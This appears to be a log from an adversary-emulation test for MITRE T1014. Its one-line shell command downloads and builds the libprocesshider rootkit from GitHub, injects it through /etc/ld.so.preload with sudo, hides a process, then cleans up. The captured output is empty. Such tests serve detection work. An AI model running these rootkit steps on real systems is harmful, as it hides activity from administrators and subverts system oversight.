[+] Tactic ID   : T1014-1
[+] Technique   : Rootkit: libprocesshider dynamic linker injection
[+] Command     :
mkdir -p ./Output/DefenceEvasion_Deb && { REPO_URL="https://github.com/gianlucaborello/libprocesshider"; REVISION="25e0587d6bf2137f8792dc83242b6b0e5a72b415"; LIBRARY_PATH="/usr/local/lib/libprocesshider.so"; EVIL_SCRIPT_PATH="/usr/local/bin/evil_script.py"; OUTPUT_FILE="./Output/DefenceEvasion_Deb/T1014_3_Defence_evasion.txt"; mkdir -p /tmp/atomic && cd /tmp/atomic && curl -sLO ${REPO_URL}/archive/${REVISION}.zip && unzip ${REVISION}.zip && cd libprocesshider-${REVISION} && make && sudo cp libprocesshider.so ${LIBRARY_PATH}; if [ -f /usr/bin/ping ]; then PING_PATH="/usr/bin/ping"; elif [ -f /bin/ping ]; then PING_PATH="/bin/ping"; else echo 'ping not found'; exit 1; fi; sudo cp ${PING_PATH} ${EVIL_SCRIPT_PATH}; echo ${LIBRARY_PATH} | sudo tee -a /etc/ld.so.preload; ${EVIL_SCRIPT_PATH} localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo 'process hidden'; sudo sed -i "\:^${LIBRARY_PATH}:d" /etc/ld.so.preload; sudo rm -rf ${LIBRARY_PATH} ${EVIL_SCRIPT_PATH} /tmp/atomic; sudo depmod -a; echo 'Execution of Defence Evasion T1014 complete.'; } &> ./Output/DefenceEvasion_Deb/T1014_3_Defence_evasion.txt
[+] Success
----- OUTPUT START -----

----- OUTPUT END -----
